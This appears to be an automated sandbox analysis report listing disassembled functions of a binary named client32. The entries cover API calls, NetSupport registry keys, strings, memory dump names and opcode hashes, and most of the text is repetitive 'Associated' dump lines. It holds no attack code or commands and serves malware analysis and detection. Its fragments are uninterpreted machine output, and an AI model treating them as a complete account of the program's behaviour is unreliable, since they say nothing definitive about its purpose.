                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountTick
                                                                                                                                                                                                    • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                                                                                                                                    • API String ID: 536389180-1512301160
                                                                                                                                                                                                    • Opcode ID: 82e572b6dc09f05acfa617eafdea0c45115b8c530f6da73777df33be47396042
                                                                                                                                                                                                    • Instruction ID: e3d06188695ac204c7c53c5cb05177b21b7d5d04c4fed9e193d22ae282c8029d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 82e572b6dc09f05acfa617eafdea0c45115b8c530f6da73777df33be47396042
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D021E770A213A64EFF938AE5DD84765FE895780FAEF004139D420956CCE7749480DF56
                                                                                                                                                                                                    Function 68599C49 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66sleeptimenetworkCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • send.WSOCK32(?,?,?,00000000), ref: 68599C93
                                                                                                                                                                                                    • timeGetTime.WINMM(?,?,?,00000000), ref: 68599CD0
                                                                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 68599CDE
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 68599D4F
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 68599D72
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
                                                                                                                                                                                                    • String ID: 3'
                                                                                                                                                                                                    • API String ID: 77915721-280543908
                                                                                                                                                                                                    • Opcode ID: 442c41e9bc28b70ce4ebe149dcb238cc43588a35f0f8e0baf2466afce3e96441
                                                                                                                                                                                                    • Instruction ID: 236607c0a8a5709804ead984073072827bcf7aa643f65f3bb03ea8ca8f484ff1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 442c41e9bc28b70ce4ebe149dcb238cc43588a35f0f8e0baf2466afce3e96441
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63216D75A042288FDF20DF64CC88B9AB7B8AF45314F4542D5E91D9B281CA30ED84CF91
                                                                                                                                                                                                    Function 110259E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetProcessImageFileNameA), ref: 110259F6
                                                                                                                                                                                                    • K32GetProcessImageFileNameA.KERNEL32(?,?,?), ref: 11025A12
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025A26
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11025A49
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                                                                                                                                    • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                                                                                                                                    • API String ID: 4186647306-532032230
                                                                                                                                                                                                    • Opcode ID: 574c1049adaa66244907c1f724b524b0e4bf3f673811b9f0067a0ab7346ebc51
                                                                                                                                                                                                    • Instruction ID: 68c8d787ea85bb7251c32f91647a1931aca61929af41b034d7bc2fd00ab8f334
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 574c1049adaa66244907c1f724b524b0e4bf3f673811b9f0067a0ab7346ebc51
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46018036A41315AFD321DF69EC84F8BB7E8EB89765F10452AF986D7600D631E800CBB4
                                                                                                                                                                                                    Function 1110C2B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001), ref: 1110C2C7
                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000001,00000000,00000000,00000000,0000000C), ref: 1110C2EA
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C317
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C321
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                                                    • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                                                                                                                                    • API String ID: 3360349984-1136101629
                                                                                                                                                                                                    • Opcode ID: c3790b5b1b7a227f0163c935fda81ea00c8c7f3da45704e0867b963cb20d20f9
                                                                                                                                                                                                    • Instruction ID: a3115959ccdc6595f724f67194249590caf2e9fcdd86f69c2c7dc21ad5a21c7d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3790b5b1b7a227f0163c935fda81ea00c8c7f3da45704e0867b963cb20d20f9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D01D4367403126FE7208E99DC89F4BBBA8EB54765F108128FA15876C0DA70E404CBA0
                                                                                                                                                                                                    Function 110313B0 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wsprintf
                                                                                                                                                                                                    • String ID: %s%s%s.bin$305090$_HF$_HW$_SW
                                                                                                                                                                                                    • API String ID: 2111968516-1635371599
                                                                                                                                                                                                    • Opcode ID: 6ee20e8f6fb76372610271b0b8adebac1fa156d7fec8b42d91c02657696d9c88
                                                                                                                                                                                                    • Instruction ID: fca8ef28a5c1b47a0d785ddae3209236aee7f502678e08843e7b704547fe2850
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ee20e8f6fb76372610271b0b8adebac1fa156d7fec8b42d91c02657696d9c88
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5E09BA0D2060C5FF3005159AC01BAFBBAC1F4434AF80C0D0FEE9A6A82E974944086D5
                                                                                                                                                                                                    Function 110FFCC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 110FFD13
                                                                                                                                                                                                    • GetStockObject.GDI32(00000004), ref: 110FFD6B
                                                                                                                                                                                                    • RegisterClassA.USER32(?), ref: 110FFD7F
                                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 110FFDBC
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                                                                                                                                    • String ID: NSMDesktopWnd
                                                                                                                                                                                                    • API String ID: 2669163067-206650970
                                                                                                                                                                                                    • Opcode ID: ba085a4a298ca2a35e46e8f911681fa87c9a64f63bde971845e5a7b50153441a
                                                                                                                                                                                                    • Instruction ID: e76810456149084fb848040635d8e5dd78421bccde4647aa26b9c0cc0d967c72
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba085a4a298ca2a35e46e8f911681fa87c9a64f63bde971845e5a7b50153441a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0231F7B5D01259AFCB41DFA9D880A9EFBF8FB09314F50862EE569E3240E7345940CF95
                                                                                                                                                                                                    Function 111419A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11141A10
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 11141A74
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseOpen
                                                                                                                                                                                                    • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                                                                                                                                    • API String ID: 47109696-3245241687
                                                                                                                                                                                                    • Opcode ID: e63fc0104197c16285f621861676926228ecfc9fc055fc562086e3d717edca7f
                                                                                                                                                                                                    • Instruction ID: a36c5406095c56a7772cd5309942c79e158504ca27ae800c645d53ad84447c87
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e63fc0104197c16285f621861676926228ecfc9fc055fc562086e3d717edca7f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A921CD75F0022A5BE710DAA8CD80F9AF7B89B45714F2045AAD95DF3140E731BE458B71
                                                                                                                                                                                                    Function 1110E460 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110E3C0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110E3EA
                                                                                                                                                                                                      • Part of subcall function 1110E3C0: __wsplitpath.LIBCMT ref: 1110E405
                                                                                                                                                                                                      • Part of subcall function 1110E3C0: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1110E439
                                                                                                                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 1110E508
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                                                                                                                                    • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                                                                                                                                    • API String ID: 806825551-1858614750
                                                                                                                                                                                                    • Opcode ID: 30defc78da8194f59f94e3ff6dc80a811373b5fd913c6199f279900626096282
                                                                                                                                                                                                    • Instruction ID: 783a1893864e797c111924e05002c86c7d14abf0d26c6a4cafca36759f9e265b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30defc78da8194f59f94e3ff6dc80a811373b5fd913c6199f279900626096282
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E214936E052A616D301CE369D807BFFFBADF86614F054978EC51D7102F626E5048751
                                                                                                                                                                                                    Function 11017520 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 71synchronizationCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000002F0,000000FF), ref: 1101755C
                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 11017565
                                                                                                                                                                                                    • CoUninitialize.COMBASE(00000001,?,?), ref: 110175F0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
